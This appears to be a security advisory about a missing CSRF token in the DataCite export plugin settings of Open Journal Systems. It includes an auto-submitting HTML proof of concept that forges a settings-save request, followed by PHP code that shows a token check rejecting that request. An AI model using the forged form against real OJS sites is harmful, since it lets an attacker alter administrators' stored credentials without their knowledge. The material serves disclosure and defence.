No CSRF token in DataCite save settings plugin (OJS only)
```html
<html>
<body>
<form action="http://10.0.2.15:8000/index.php/e/$$$call$$$/grid/settings/plugins/settings-plugin-grid/manage?plugin=DataciteExportPlugin&category=importexport&verb=save" method="POST">
<input type="hidden" name="username" value="" />
<input type="hidden" name="password" value="" />
<input type="hidden" name="testUsername" value="" />
<input type="hidden" name="testPassword" value="" />
<input type="hidden" name="testDOIPrefix" value="" />
<input type="hidden" name="submitFormButton" value="" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```
# Impact
This vulnerability can be used to trick admins into changing the settings of the OJS DataCite plugin.
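
One way to close this gap, shown as an added example that is not part of the original report and is not OJS code: a session-bound token check that runs before the `save` verb writes anything. The function names, the `csrfToken` field name and the sample values are assumptions made for illustration.

```php
<?php
// Added example, not OJS code. Names and the csrfToken field are hypothetical.

function issueCsrfToken(array &$session): string
{
    // One random token per session, rendered as a hidden field in the settings form.
    if (empty($session['csrfToken'])) {
        $session['csrfToken'] = bin2hex(random_bytes(32));
    }
    return $session['csrfToken'];
}

function isValidCsrf(array $session, string $method, array $post): bool
{
    $expected = $session['csrfToken'] ?? '';
    $supplied = $post['csrfToken'] ?? '';
    // State changes only via POST, and only with the token issued to this session.
    return $method === 'POST'
        && is_string($supplied)
        && $expected !== ''
        && hash_equals($expected, $supplied); // constant-time comparison
}

function saveDataciteSettings(array $session, string $method, array $post, array &$settings): int
{
    if (!isValidCsrf($session, $method, $post)) {
        return 403; // reject before touching the stored settings
    }
    foreach (['username', 'password', 'testUsername', 'testPassword', 'testDOIPrefix'] as $field) {
        $settings[$field] = is_string($post[$field] ?? null) ? $post[$field] : '';
    }
    return 200;
}

// Constructed sample data.
$session  = [];
$settings = ['username' => 'journal-account', 'password' => 'stored-secret'];
$token    = issueCsrfToken($session);

// Same fields as the auto-submitted form in this report: no token, so it is refused.
$forged = ['username' => '', 'password' => '', 'testUsername' => '',
           'testPassword' => '', 'testDOIPrefix' => '', 'submitFormButton' => ''];
var_dump(saveDataciteSettings($session, 'POST', $forged, $settings));
var_dump($settings['username']); // stored value is unchanged

// A form rendered by the application itself carries the session's token.
$legit = ['username' => 'new-account', 'csrfToken' => $token];
var_dump(saveDataciteSettings($session, 'POST', $legit, $settings));
```

The forged request returns 403 and leaves the stored credentials intact, while the request carrying the session's token returns 200.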